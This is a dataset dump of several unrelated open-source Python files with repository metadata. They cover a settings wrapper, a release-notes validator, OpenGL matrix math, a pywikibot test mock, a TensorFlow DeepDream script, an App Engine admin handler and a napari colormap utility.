| 4 | 2015-12-22T15:03:43.000Z | 2016-07-28T08:11:48.000Z | settings.py | SalinderSidhu/CHIP8 | 46a01aa7675805b84809d1e9762905de8fdccc66 | [
"MIT"
]
| null | null | null | settings.py | SalinderSidhu/CHIP8 | 46a01aa7675805b84809d1e9762905de8fdccc66 | [
"MIT"
]
| null | null | null | import configparser
class Settings:
'''The Settings class is a wrapper for configparser and it's functions.
This class simplifies the tasks of loading, storing and manipulating
settings data.'''
def __init__(self, filename):
'''Create a new Settings object with a specific file name.'''
# Exceptions
self.__settingException = Exception(
'Cannot find specified setting data!')
# Settings variables
self.__filename = filename
self.__config = configparser.ConfigParser()
# Load settings from existing file (if one exists)
self.__isEmpty = len(self.__config.read(self.__filename)) == 0
def isEmpty(self):
'''Return True if there is not settings data loaded, otherwise return
False.'''
return self.__isEmpty
def addNewSetting(self, category, settingDict):
'''Add a new setting with the specified category and data. Save the new
settings data to a file.'''
self.__config[category] = settingDict.copy()
self.__saveAllSettings()
self.__isEmpty = False
def getSetting(self, category, key):
'''Return a setting value from the specified category and setting
key.'''
try:
return self.__config.get(category, key)
except KeyError:
raise self.__settingException
def editSetting(self, category, key, value):
'''Change an existing setting with a specified category and setting key
to the value specified. Save the new settings data to a file.'''
try:
self.__config.set(category, key, str(value))
self.__saveAllSettings()
except KeyError:
raise self.__settingException
def __saveAllSettings(self):
'''Write the current settings data to a file.'''
with open(self.__filename, 'w') as configFile:
self.__config.write(configFile)
| 36.679245 | 79 | 0.646091 | 1,921 | 0.988169 | 0 | 0 | 0 | 0 | 0 | 0 | 816 | 0.419753 |
c7d59e3cde73fd0dad74b149197ee60ec8e8c83b | 3,900 | py | Python | demisto_sdk/commands/common/hook_validations/release_notes.py | yalonso7/demisto-sdk | 4b832078cdadb0b604a064532975e8be68ac726a | [
"MIT"
]
| null | null | null | demisto_sdk/commands/common/hook_validations/release_notes.py | yalonso7/demisto-sdk | 4b832078cdadb0b604a064532975e8be68ac726a | [
"MIT"
]
| null | null | null | demisto_sdk/commands/common/hook_validations/release_notes.py | yalonso7/demisto-sdk | 4b832078cdadb0b604a064532975e8be68ac726a | [
"MIT"
]
| null | null | null | from __future__ import print_function
import itertools
from demisto_sdk.commands.common.constants import VALIDATED_PACK_ITEM_TYPES
from demisto_sdk.commands.common.errors import Errors
from demisto_sdk.commands.common.hook_validations.base_validator import \
BaseValidator
from demisto_sdk.commands.common.tools import (get_latest_release_notes_text,
get_release_notes_file_path)
from demisto_sdk.commands.update_release_notes.update_rn import UpdateRN
class ReleaseNotesValidator(BaseValidator):
"""Release notes validator is designed to ensure the existence and correctness of the release notes in content repo.
Attributes:
file_path (str): the path to the file we are examining at the moment.
release_notes_path (str): the path to the changelog file of the examined file.
latest_release_notes (str): the text of the UNRELEASED section in the changelog file.
master_diff (str): the changes in the changelog file compared to origin/master.
"""
def __init__(self, file_path, modified_files=None, pack_name=None, added_files=None, ignored_errors=None,
print_as_warnings=False):
super().__init__(ignored_errors=ignored_errors, print_as_warnings=print_as_warnings)
self.file_path = file_path
self.modified_files = modified_files
self.added_files = added_files
self.pack_name = pack_name
self.release_notes_path = get_release_notes_file_path(self.file_path)
self.latest_release_notes = get_latest_release_notes_text(self.release_notes_path)
def are_release_notes_complete(self):
is_valid = True
modified_added_files = itertools.chain.from_iterable((self.added_files or [], self.modified_files or []))
if modified_added_files:
for file in modified_added_files:
if not any(permitted_type in file for permitted_type in VALIDATED_PACK_ITEM_TYPES):
continue
elif self.pack_name in file:
update_rn_util = UpdateRN(pack=self.pack_name, pack_files=set(), update_type=None,
added_files=set())
file_name, file_type = update_rn_util.identify_changed_file_type(file)
if file_name and file_type:
if (file_type not in self.latest_release_notes) or (file_name not in self.latest_release_notes):
entity_name = update_rn_util.get_display_name(file)
error_message, error_code = Errors.missing_release_notes_entry(file_type, self.pack_name,
entity_name)
if self.handle_error(error_message, error_code, self.file_path):
is_valid = False
return is_valid
def has_release_notes_been_filled_out(self):
release_notes_comments = self.latest_release_notes
if len(release_notes_comments) == 0:
error_message, error_code = Errors.release_notes_file_empty()
if self.handle_error(error_message, error_code, file_path=self.file_path):
return False
elif '%%UPDATE_RN%%' in release_notes_comments:
error_message, error_code = Errors.release_notes_not_finished()
if self.handle_error(error_message, error_code, file_path=self.file_path):
return False
return True
def is_file_valid(self):
"""Checks if given file is valid.
Return:
bool. True if file's release notes are valid, False otherwise.
"""
validations = [
self.has_release_notes_been_filled_out(),
self.are_release_notes_complete()
]
return all(validations)
| 50 | 120 | 0.661795 | 3,391 | 0.869487 | 0 | 0 | 0 | 0 | 0 | 0 | 640 | 0.164103 |
c7d5fc15217b2b0e024e35082215227dc7639d0e | 14,326 | py | Python | PyOpenGL/PyGame/ex06/src/mathematics.py | hoppfull/Legacy-Python | 43f465bfdb76c91f2ac16aabb0783fdf5f459adb | [
"MIT"
]
| null | null | null | PyOpenGL/PyGame/ex06/src/mathematics.py | hoppfull/Legacy-Python | 43f465bfdb76c91f2ac16aabb0783fdf5f459adb | [
"MIT"
]
| null | null | null | PyOpenGL/PyGame/ex06/src/mathematics.py | hoppfull/Legacy-Python | 43f465bfdb76c91f2ac16aabb0783fdf5f459adb | [
"MIT"
]
| null | null | null | import numpy as np
class ProjectionMatrix():
"""This matrix provides projection distortion.
Projection distortion is when things that are far away
appear smaller and things that are close appear bigger.
This works flawlessly so far. Takes in screen-size and
provides near- and far clipping. fov is field-of-view
and smaller values will make view zoom in. A value of 1
will provide a panorama image."""
def __init__(self, screen_size, zNear, zFar, fov):
if fov >= 1: # Limit to 0.99 or we get infinity error at 1.0. >1.0 will give strange result.
fov = 0.99999;
tanHalfFOV = np.tan(fov * np.pi / 2.0)
zRange = zNear - zFar;
self.projectionMatrix = np.array([
[ # Row 0:
screen_size[1] / (tanHalfFOV * screen_size[0]),
0,
0,
0
],
[ # Row 1:
0,
1.0 / tanHalfFOV,
0,
0
],
[ # Row 2:
0,
0,
(-zNear - zFar)/zRange,
2.0 * zFar * zNear / zRange
],
[ # Row 3:
0,
0,
1,
0
],
], dtype=np.float32)
def get(self):
return self.projectionMatrix
class ViewMatrix():
"""This matrix transform a model as if it's percieved by a
camera with a target 'self.t' in global world coordinates
and a position 'self.p' in global world coordinates. Global
coordinates are x=right, y=forth and z=up."""
def __init__(self, position):
self.p = vec3(position.x, position.y, position.z)
# target coordinates:
self.t = vec3(0, 0, 0)
# tolerance value:
self.tolerance = 0.5
"""The tolerance value is for testing when view lies within bounds.
In case of 'self.orbitTarget()', it's for testing when view gets too
close to target z-axis. In case of 'self.approachTarget()', it's for
testing when view gets too close to target coordinates."""
# Sensitivity value:
self.alpha = 0.01
"""The sensitivity value is for tuning how sensitive 'self.orbitTarget()'
and 'self.approachTarget()' are to user input."""
# Initialize the rotationMatrix as the identity matrix:
self.rotationMatrix = np.matrix([
[1, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, 1, 0],
[0, 0, 0, 1]
], dtype=np.float32)
def translate(self, dp):
self.p = self.p.add(dp)
def setPos(self, p):
self.p = vec3(p.x, p.y, p.z)
def lookAt(self, target=None, up=None):
"""This function focuses the view on a target.
Tested and seem to work as it should... ........finally........"""
if target != None:
self.t = vec3(target.x, target.y, target.z)
f = self.t.sub(self.p).norm()
if up != None:
u = vec3(up.x, up.y, up.z).norm()
else:
u = vec3(0, 0, 1)
s = f.cross(u).norm() # f x u
u = s.cross(f) # s x f, automatically normalized
self.rotationMatrix = np.matrix([
[ s.x, s.y, s.z, 0],
[ u.x, u.y, u.z, 0],
[ f.x, f.y, f.z, 0],
[ 0, 0, 0, 1]], dtype=np.float32)
def approachTarget(self, amount):
"""This function approaches the view towards the target
when amount is positive and moves away from the target when
amount is negative. It will stay outside the self.tolerance
distance. When completely close to the target, view cannot
look up or down too much."""
if amount == 0:
# If amount is zero, do nothing.
return
if self.t.sub(self.p).mag()*(1 - amount) > 2.0*self.tolerance:
# If 'self.approachTarget()' will not take the view within twice the
# tolerance distance, approach the target by given amount:
self.p = self.p.add(self.t.sub(self.p).scale(amount))
def orbitTarget(self, axis):
if axis == (0, 0):
return # Do nothing
# Get target2camera-vector:
p = self.p.sub(self.t)
# Assign passed values to variables we can change if we have to:
axis_x = -axis[0]
if axis[1] > 0.30/self.alpha:
"""If axis[1] is bigger than 0.40 / self.alpha, we get strange results
becouse view can 'tunnel' over the boundary set when getting view is
getting close to target z-axis. Changing tolerance doen't change it a
whole lot so I'm setting a boundary value for axis[1] to +-0.30 / self.alpha which is
really really large as it is."""
axis_y = 0.3 / self.alpha
elif axis[1] < -0.30/self.alpha:
axis_y = -0.3 / self.alpha
else:
axis_y = axis[1]
if axis_y > 0 and p.z > 0:
"""Tests if user is trying to orbit the view up
and if the view is above the 'equator'. The second
test is to make sure the view doesn't get stuck
if it gets inside the tolerance bounds and can get back
out as long as it's trying to move away."""
if vec2(p.x, p.y).mag() < self.tolerance:
axis_y = 0
elif axis_y < 0 and p.z < 0:
"""Tests if user is trying to orbit the view down
and if the view is below the 'equator'. Same test
but for different case as the one above."""
if vec2(p.x, p.y).mag() < self.tolerance:
axis_y = 0
if axis_y == 0: #If the other axis is zero:
# Amount of rotation for target-cam x-axis: (longitude, west2east)
v = vec3(0, 0, 1) # v is up vector
rate = axis_x
elif axis_x == 0: #If the other axis is zero:
# Amount of rotation for target-cam y-axis: (latitude, south2north)
v = p.cross(vec3(0, 0, 1)).norm() # v is side vector
rate = axis_y
else: #If neither is zero
# u is up vector:
u = vec3(0, 0, axis_x)
# s is side vector:
s = p.cross(vec3(0, 0, 1)).norm().scale(axis_y)
# v is combined vector:
v = u.add(s).norm()
rate = abs(axis_x) + abs(axis_y)
sin = np.sin(self.alpha * rate)
cos = np.cos(self.alpha * rate)
rotateMatrix = np.matrix([
[ # Row 0:
( v.x*v.x*(1 - cos) + cos ),
( v.y*v.x*(1 - cos) - v.z*sin ),
( v.z*v.x*(1 - cos) + v.y*sin ),
0
],
[ # Row 1:
( v.x*v.y*(1 - cos) + v.z*sin ),
( v.y*v.y*(1 - cos) + cos ),
( v.z*v.y*(1 - cos) - v.x*sin ),
0
],
[ # Row 2:
( v.x*v.z*(1 - cos) - v.y*sin ),
( v.y*v.z*(1 - cos) + v.x*sin ),
( v.z*v.z*(1 - cos) + cos ),
0
],
[ # Row 3:
0,
0,
0,
1
],
], dtype=np.float32)
p = rotateMatrix.dot( np.array([p.x, p.y, p.z, 1.0]) ).getA()[0][0:3]
self.p = vec3(p[0], p[1], p[2]).add(self.t)
self.lookAt(self.t)
def get(self):
translationMatrix = np.matrix([
[1,0,0,-self.p.x],
[0,1,0,-self.p.y],
[0,0,1,-self.p.z],
[0,0,0,1]
], dtype=np.float32)
return (self.rotationMatrix*translationMatrix).getA()
class ModelMatrix():
"""This matrix transform a model into world coordinates.
Heavily tested and should work properly. Could probably
be optimized further or even translated into cython for
performance."""
def __init__(self, position):
self.p = vec3(position.x, position.y, position.z)
self.s = vec3(1, 1, 1)
self.rotationMatrix = np.matrix([
[1, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, 1, 0],
[0, 0, 0, 1]
], dtype=np.float32)
def translate(self, dp):
self.p = self.p.add(dp)
def rotate(self, turns, unit):
"""Heavily tested and should work! Requires 'GL_TRUE'
to be passed to the uniform on shader program to work."""
u = unit.norm()
sin = np.sin(turns * np.pi * 2)
cos = np.cos(turns * np.pi * 2)
self.rotationMatrix = self.rotationMatrix.dot(
np.matrix([
[ # Row 0:
( u.x*u.x*(1 - cos) + cos ),
( u.y*u.x*(1 - cos) - u.z*sin ),
( u.z*u.x*(1 - cos) + u.y*sin ),
0
],
[ # Row 1:
( u.x*u.y*(1 - cos) + u.z*sin ),
( u.y*u.y*(1 - cos) + cos ),
( u.z*u.y*(1 - cos) - u.x*sin ),
0
],
[ # Row 2:
( u.x*u.z*(1 - cos) - u.y*sin ),
( u.y*u.z*(1 - cos) + u.x*sin ),
( u.z*u.z*(1 - cos) + cos ),
0
],
[ # Row 3:
0,
0,
0,
1
],
], dtype=np.float32))
def scale(self, s):
self.s = vec3(s.x, s.y, s.z)
def lookAt(self, target, up=None):
"""Heavily tested and should work! Requires 'GL_TRUE'
to be passed to the uniform on shader program to work."""
# Get normalized vector pointing from model to target
f = target.sub(self.p).norm()
if up != None:
u = vec3(up.x, up.y, up.z).norm()
else:
u = vec3(0, 0, 1)
s = f.cross(u).norm() # f x u
# s must be normalized! Consider when f and u are not perpendicular!
u = s.cross(f) # s x f, automatically normalized
self.rotationMatrix = np.matrix([
[ s.x, f.x, u.x, 0],
[ s.y, f.y, u.y, 0],
[ s.z, f.z, u.z, 0],
[ 0, 0, 0, 1]], dtype=np.float32)
def get(self):
"""Heavily tested and should work! Requires 'GL_TRUE'
to be passed to the uniform on shader program to work."""
translationMatrix = np.matrix([
[1,0,0,self.p.x],
[0,1,0,self.p.y],
[0,0,1,self.p.z],
[0,0,0,1]
], dtype=np.float32)
scaleMatrix = np.matrix([
[self.s.x,0,0,0],
[0,self.s.y,0,0],
[0,0,self.s.z,0],
[0,0,0,1]
], dtype=np.float32)
return (translationMatrix*self.rotationMatrix*scaleMatrix).getA()
class quaternion():
def __init__(self, x, y, z, w):
self.x = float(x)
self.y = float(y)
self.z = float(z)
self.w = float(w)
def mag(self): # Get length of quaternion
return np.sqrt(self.x*self.x + self.y*self.y + self.y*self.y + self.y*self.y)
def norm(self): # Normalize quaternion
return quaternion(
x= self.x / self.mag(),
y= self.y / self.mag(),
z= self.z / self.mag(),
w= self.w / self.mag())
def conjugate(self):
return quaternion(
x=-self.x,
y=-self.y,
z=-self.z,
w= self.w)
def xQ(self, q): # Multiply with quaternion
return quaternion(
x= self.x * q.w + self.w * q.x + self.y * q.z - self.z * q.y,
y= self.y * q.w + self.w * q.y + self.z * q.x - self.x * q.z,
z= self.z * q.w + self.w * q.z + self.x * q.y - self.y * q.x,
w= self.w * q.w - self.x * q.x - self.y * q.y - self.z * q.z)
def xV(self, v): # Multiply with vector
return quaternion(
x= self.w*v.x + self.y*v.z - self.z*v.y,
y= self.w*v.y + self.z*v.x - self.x*v.z,
z= self.w*v.z + self.x*v.y - self.y*v.x,
w=-self.x*v.x - self.y*v.y - self.z*v.z)
class vec2():
def __init__(self, x, y):
self.x = float(x)
self.y = float(y)
def mag(self):
return np.sqrt(self.x*self.x + self.y*self.y)
def norm(self):
return vec2(
x= self.x / self.mag(),
y= self.y / self.mag())
class vec3():
def __init__(self, x, y, z):
self.x = float(x)
self.y = float(y)
self.z = float(z)
def cross(self, vector):
return vec3(
x= self.y*vector.z - self.z*vector.y,
y= self.z*vector.x - self.x*vector.z,
z= self.x*vector.y - self.y*vector.x)
def dot(self, vector):
return float( self.x*vector.x + self.y*vector.y + self.z*vector.z )
def mag(self):
return np.sqrt(self.x*self.x + self.y*self.y + self.z*self.z)
def norm(self):
return vec3(
x= self.x / self.mag(),
y= self.y / self.mag(),
z= self.z / self.mag())
def add(self, vector):
return vec3(
x= self.x + vector.x,
y= self.y + vector.y,
z= self.z + vector.z)
def sub(self, vector):
return vec3(
x= self.x - vector.x,
y= self.y - vector.y,
z= self.z - vector.z)
def scale(self, scalar):
return vec3(
self.x*scalar,
self.y*scalar,
self.z*scalar)
def rotate(self, angle, axis):
pass
| 34.603865 | 100 | 0.454279 | 14,274 | 0.99637 | 0 | 0 | 0 | 0 | 0 | 0 | 3,986 | 0.278235 |
c7d672fb0397af44cf591c05913dd9f20b250483 | 1,652 | py | Python | test_utils/mocks.py | radomd92/botjagwar | 1dc96600c40041057a9f9afde38c31ca34b8db38 | [
"MIT"
]
| 7 | 2015-01-23T17:24:04.000Z | 2022-01-12T16:54:24.000Z | test_utils/mocks.py | radomd92/botjagwar | 1dc96600c40041057a9f9afde38c31ca34b8db38 | [
"MIT"
]
| 18 | 2017-12-09T01:11:23.000Z | 2021-09-22T13:26:24.000Z | test_utils/mocks.py | radomd92/botjagwar | 1dc96600c40041057a9f9afde38c31ca34b8db38 | [
"MIT"
]
| 1 | 2015-06-22T02:17:55.000Z | 2015-06-22T02:17:55.000Z | from xml.dom import minidom
import pywikibot
from api.decorator import time_this
SiteMock = pywikibot.Site
class PageMock(pywikibot.Page):
def __init__(self, *args, **kwargs):
super(PageMock, self).__init__(*args, **kwargs)
self.filename = "test_data/test_pages_%s.xml" % self.site.lang
self.parsed = minidom.parse(open(self.filename, 'r'))
self.pages = self.parsed.getElementsByTagName('page')
def put(self, newtext, summary=None, watch=None, minor=True, botflag=None,
force=False, asynchronous=False, callback=None, **kwargs):
print(('Saving page [[%s]] through put' % self.title()))
def save(self, summary=None, watch=None, minor=True, botflag=None,
force=False, asynchronous=False, callback=None,
apply_cosmetic_changes=None, quiet=False, **kwargs):
print(('Saving page [[%s]] through save' % self.title()))
def _save(self, summary=None, watch=None, minor=True, botflag=None,
cc=None, quiet=False, **kwargs):
print(('Saving page [[%s]] through save' % self.title()))
@time_this('Page.get() method mock')
def get(self, force=False, get_redirect=False, sysop=False):
for page in self.pages:
xml_title = page.getElementsByTagName(
'title')[0].childNodes[0].nodeValue
if xml_title == self.title():
return page.getElementsByTagName(
'text')[0].childNodes[0].nodeValue
print(('No page %s found in "%s"' % (self.title(), self.filename)))
return ''
p = PageMock(SiteMock('en', 'wiktionary'), 'gaon')
e = p.get()
| 36.711111 | 78 | 0.624092 | 1,474 | 0.892252 | 0 | 0 | 478 | 0.289346 | 0 | 0 | 223 | 0.134988 |
c7d6da38ffc0a1fb86619973f197115c4b076c8a | 5,796 | py | Python | dl_tensorflow/deepdream.py | jarvisqi/deep_learning | 988a5b0551ccf2c480a519c66aca149053826d30 | [
"MIT"
]
| 32 | 2017-10-26T13:37:36.000Z | 2021-03-24T09:06:45.000Z | dl_tensorflow/deepdream.py | 2892778775/deep_learning | 988a5b0551ccf2c480a519c66aca149053826d30 | [
"MIT"
]
| 3 | 2018-11-19T05:55:46.000Z | 2019-03-01T05:20:43.000Z | dl_tensorflow/deepdream.py | 2892778775/deep_learning | 988a5b0551ccf2c480a519c66aca149053826d30 | [
"MIT"
]
| 38 | 2017-11-08T15:42:48.000Z | 2021-05-10T00:42:33.000Z | import os
from functools import partial
from io import BytesIO
import numpy as np
import PIL.Image
import scipy.misc
import tensorflow as tf
graph = tf.Graph()
sess = tf.InteractiveSession(graph=graph)
model_fn = "./models/tensorflow_inception_graph.pb"
with tf.gfile.FastGFile(model_fn, 'rb') as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
t_input = tf.placeholder(tf.float32, name="input")
imagenet_mean = 117.0
t_preprocessed = tf.expand_dims(t_input-imagenet_mean, 0)
tf.import_graph_def(graph_def, {"input": t_preprocessed})
def load_inception():
graph = tf.Graph()
sess = tf.InteractiveSession(graph=graph)
model_fn = "./models/tensorflow_inception_graph.pb"
with tf.gfile.FastGFile(model_fn, 'rb') as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
# 定义t_input为我们输入的图像
t_input = tf.placeholder(np.float32, name='input')
imagenet_mean = 117.0
# 输入图像需要经过处理才能送入网络中
# expand_dims是加一维,从[height, width, channel]变成[1, height, width, channel]
# t_input - imagenet_mean是减去一个均值
t_preprocessed = tf.expand_dims(t_input - imagenet_mean, 0)
tf.import_graph_def(graph_def, {'input': t_preprocessed})
# 找到所有卷积层
layers = [op.name for op in graph.get_operations() if op.type ==
"Conv2D" and "import/" in op.name]
# 输出卷积层层数
print('Number of layers', len(layers))
# 特别地,输出mixed4d_3x3_bottleneck_pre_relu的形状
name = 'mixed4d_3x3_bottleneck_pre_relu'
print('shape of %s: %s' %(name, str(graph.get_tensor_by_name('import/' + name + ':0').get_shape())))
def savearray(img_array, img_name):
scipy.misc.toimage(img_array).save(img_name)
print('img saved: %s' % img_name)
def visstd(a, s=0.1):
return (a-a.mean())/max(a.std(), 1e-4)*s+0.5
def resize_ratio(img, ratio):
min = img.min()
max = img.max()
img = (img - min) / (max - min) * 255
img = np.float32(scipy.misc.imresize(img, ratio))
img = img / 255 * (max - min) + min
return img
def resize(img, hw):
min = img.min()
max = img.max()
img = (img - min) / (max - min) * 255
img = np.float32(scipy.misc.imresize(img, hw))
img = img / 255 * (max - min) + min
return img
def calc_grad_tiled(img, t_grad, tile_size=512):
sz = tile_size
h, w = img.shape[:2]
sx, sy = np.random.randint(sz, size=2)
img_shift = np.roll(np.roll(img, sx, 1), sy, 0) # 先在行上做整体移动,再在列上做整体移动
grad = np.zeros_like(img)
for y in range(0, max(h - sz // 2, sz), sz):
for x in range(0, max(w - sz // 2, sz), sz):
sub = img_shift[y:y + sz, x:x + sz]
g = sess.run(t_grad, {t_input: sub})
grad[y:y + sz, x:x + sz] = g
return np.roll(np.roll(grad, -sx, 1), -sy, 0)
k = np.float32([1, 4, 6, 4, 1])
k = np.outer(k, k)
k5x5 = k[:, :, None, None] / k.sum() * np.eye(3, dtype=np.float32)
# 将拉普拉斯金字塔还原到原始图像
def lap_merge(levels):
img = levels[0]
for hi in levels[1:]:
with tf.name_scope('merge'):
img = tf.nn.conv2d_transpose(img, k5x5 * 4, tf.shape(hi), [1, 2, 2, 1]) + hi
return img
# 对img做标准化。
def normalize_std(img, eps=1e-10):
with tf.name_scope('normalize'):
std = tf.sqrt(tf.reduce_mean(tf.square(img)))
return img / tf.maximum(std, eps)
# 拉普拉斯金字塔标准化
def lap_normalize(img, scale_n=4):
img = tf.expand_dims(img, 0)
tlevels = lap_split_n(img, scale_n)
# 每一层都做一次normalize_std
tlevels = list(map(normalize_std, tlevels))
out = lap_merge(tlevels)
return out[0, :, :, :]
# 这个函数将图像分为低频和高频成分
def lap_split(img):
with tf.name_scope('split'):
# 做过一次卷积相当于一次“平滑”,因此lo为低频成分
lo = tf.nn.conv2d(img, k5x5, [1, 2, 2, 1], 'SAME')
# 低频成分放缩到原始图像一样大小得到lo2,再用原始图像img减去lo2,就得到高频成分hi
lo2 = tf.nn.conv2d_transpose(lo, k5x5 * 4, tf.shape(img), [1, 2, 2, 1])
hi = img - lo2
return lo, hi
# 这个函数将图像img分成n层拉普拉斯金字塔
def lap_split_n(img, n):
levels = []
for i in range(n):
# 调用lap_split将图像分为低频和高频部分
# 高频部分保存到levels中
# 低频部分再继续分解
img, hi = lap_split(img)
levels.append(hi)
levels.append(img)
return levels[::-1]
def tffunc(*argtypes):
placeholders = list(map(tf.placeholder, argtypes))
def wrap(f):
out = f(*placeholders)
def wrapper(*args, **kw):
return out.eval(dict(zip(placeholders, args)), session=kw.get('session'))
return wrapper
return wrap
def render_deepdream(img0, iter_n=10, step=1.5, octave_n=4, octave_scale=1.4):
name = 'mixed4d_3x3_bottleneck_pre_relu'
channel = 139
t_obj = graph.get_tensor_by_name("import/%s:0" % name)
t_score = tf.reduce_mean(t_obj)
t_grad = tf.gradients(t_score, t_input)[0]
lap_n=4
# 将lap_normalize转换为正常函数
lap_norm_func = tffunc(np.float32)(partial(lap_normalize, scale_n=lap_n))
img = img0
# 同样将图像进行金字塔分解
# 此时提取高频、低频的方法比较简单。直接缩放就可以
octaves = []
for i in range(octave_n-1):
hw = img.shape[:2]
lo = resize(img, np.int32(np.float32(hw) / octave_scale))
hi = img - resize(lo, hw)
img = lo
octaves.append(hi)
# 先生成低频的图像,再依次放大并加上高频
for octave in range(octave_n):
if octave > 0:
hi = octaves[-octave]
img = resize(img, hi.shape[:2]) + hi
for i in range(iter_n):
g = calc_grad_tiled(img, t_grad)
img += g * (step / (np.abs(g).mean() + 1e-7))
# 唯一的区别在于我们使用lap_norm_func来标准化g!
# g = lap_norm_func(g)
# img += g * step
print('.', end=' ')
img = img.clip(0, 255)
savearray(img, './predict_img/deepdream.jpg')
if __name__ == '__main__':
img0 = PIL.Image.open('./images/test.jpg')
img0 = np.float32(img0)
render_deepdream(img0)
| 30.031088 | 104 | 0.619393 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,630 | 0.253106 |
c7d6e3bbbed972de89ca1f857b7b3b2178ada3d2 | 1,829 | py | Python | admin.py | BlueBlock/usage-reporter | e30bbef6d281944d62f716c37aff17861a653967 | [
"MIT"
]
| 4 | 2018-08-30T06:16:35.000Z | 2022-02-18T08:06:21.000Z | admin.py | BlueBlock/usage-reporter | e30bbef6d281944d62f716c37aff17861a653967 | [
"MIT"
]
| 1 | 2018-03-29T17:04:44.000Z | 2018-03-29T17:04:44.000Z | admin.py | BlueBlock/usage-reporter | e30bbef6d281944d62f716c37aff17861a653967 | [
"MIT"
]
| 4 | 2018-01-31T06:55:32.000Z | 2022-01-16T10:39:18.000Z | import calendar
import datetime
import logging
import os
import webapp2
import dbmodel
TESTING = os.environ.get('SERVER_SOFTWARE', '').startswith('Development')
class ResetHandler(webapp2.RequestHandler):
def get(self):
timestamp = calendar.timegm(datetime.datetime.utcnow().timetuple())
self.response.write('<html><body><form method="POST"><input type="text" value="' + str(
timestamp) + '" name="day"><input type="submit"></form></body></html>')
def post(self):
timestamp = int(self.request.get('day', None))
entry_day = datetime.datetime.utcfromtimestamp(timestamp).date()
logging.info('Processing day %s', entry_day)
starttimestamp = calendar.timegm((entry_day.year, entry_day.month, entry_day.day, 0, 0, 0))
endtimestamp = starttimestamp + 24 * 60 * 60
logging.info('starttimestamp, endtimestamp: (%s, %s)', starttimestamp, endtimestamp)
count = 0
for item in dbmodel.ReportItem.all().filter('counted', 0).filter('eventtype =', 'Information').filter(
'timestamp <', endtimestamp).filter('timestamp >=', starttimestamp).order('timestamp'):
item.counted = None
item.put()
count += 1
for item in dbmodel.ReportItem.all().filter('counted', 1).filter('eventtype =', 'Information').filter(
'timestamp <', endtimestamp).filter('timestamp >=', starttimestamp).order('timestamp'):
item.counted = None
item.put()
count += 1
logging.info('Reset for %s items', count)
for item in dbmodel.AggregateItem.all().filter('timestamp =', starttimestamp).filter('rangetype =', 'day'):
item.delete()
app = webapp2.WSGIApplication([
('/tasks/admin/reset', ResetHandler)
], debug=TESTING)
| 35.173077 | 115 | 0.632586 | 1,569 | 0.857846 | 0 | 0 | 0 | 0 | 0 | 0 | 430 | 0.235101 |
c7d717769a7df13adf5117eb840b41a6b41f5506 | 2,708 | py | Python | napari/utils/colormaps/categorical_colormap_utils.py | Zac-HD/napari | 102a7e8f845893c874d2b86f9371d41130100b89 | [
"BSD-3-Clause"
]
| 1 | 2021-04-24T10:10:54.000Z | 2021-04-24T10:10:54.000Z | napari/utils/colormaps/categorical_colormap_utils.py | Zac-HD/napari | 102a7e8f845893c874d2b86f9371d41130100b89 | [
"BSD-3-Clause"
]
| 2 | 2021-05-17T02:15:08.000Z | 2022-03-12T21:19:52.000Z | napari/utils/colormaps/categorical_colormap_utils.py | Zac-HD/napari | 102a7e8f845893c874d2b86f9371d41130100b89 | [
"BSD-3-Clause"
]
| null | null | null | from dataclasses import dataclass
from itertools import cycle
from typing import Dict, Union
import numpy as np
from ...layers.utils.color_transformations import (
transform_color,
transform_color_cycle,
)
@dataclass(eq=False)
class ColorCycle:
"""A dataclass to hold a color cycle for the fallback_colors
in the CategoricalColormap
Attributes
----------
values : np.ndarray
The (Nx4) color array of all colors contained in the color cycle.
cycle : cycle
The cycle object that gives fallback colors.
"""
values: np.ndarray
cycle: cycle
@classmethod
def __get_validators__(cls):
yield cls.validate_type
@classmethod
def validate_type(cls, val):
# turn a generic dict into object
if isinstance(val, dict):
return _coerce_colorcycle_from_dict(val)
elif isinstance(val, ColorCycle):
return val
else:
return _coerce_colorcycle_from_colors(val)
def _json_encode(self):
return {'values': self.values.tolist()}
def __eq__(self, other):
if isinstance(other, ColorCycle):
eq = np.array_equal(self.values, other.values)
else:
eq = False
return eq
def _coerce_colorcycle_from_dict(
val: Dict[str, Union[str, list, np.ndarray, cycle]]
) -> ColorCycle:
# validate values
color_values = val.get('values')
if color_values is None:
raise ValueError('ColorCycle requires a values argument')
transformed_color_values = transform_color(color_values)
# validate cycle
color_cycle = val.get('cycle')
if color_cycle is None:
transformed_color_cycle = transform_color_cycle(
color_cycle=color_values,
elem_name='color_cycle',
default="white",
)[0]
else:
transformed_color_cycle = color_cycle
return ColorCycle(
values=transformed_color_values, cycle=transformed_color_cycle
)
def _coerce_colorcycle_from_colors(
val: Union[str, list, np.ndarray]
) -> ColorCycle:
if isinstance(val, str):
val = [val]
(
transformed_color_cycle,
transformed_color_values,
) = transform_color_cycle(
color_cycle=val,
elem_name='color_cycle',
default="white",
)
return ColorCycle(
values=transformed_color_values, cycle=transformed_color_cycle
)
def compare_colormap_dicts(cmap_1, cmap_2):
if len(cmap_1) != len(cmap_2):
return False
for k, v in cmap_1.items():
if k not in cmap_2:
return False
if not np.allclose(v, cmap_2[k]):
return False
return True
| 25.308411 | 73 | 0.64771 | 1,022 | 0.3774 | 60 | 0.022157 | 1,043 | 0.385155 | 0 | 0 | 467 | 0.172452 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.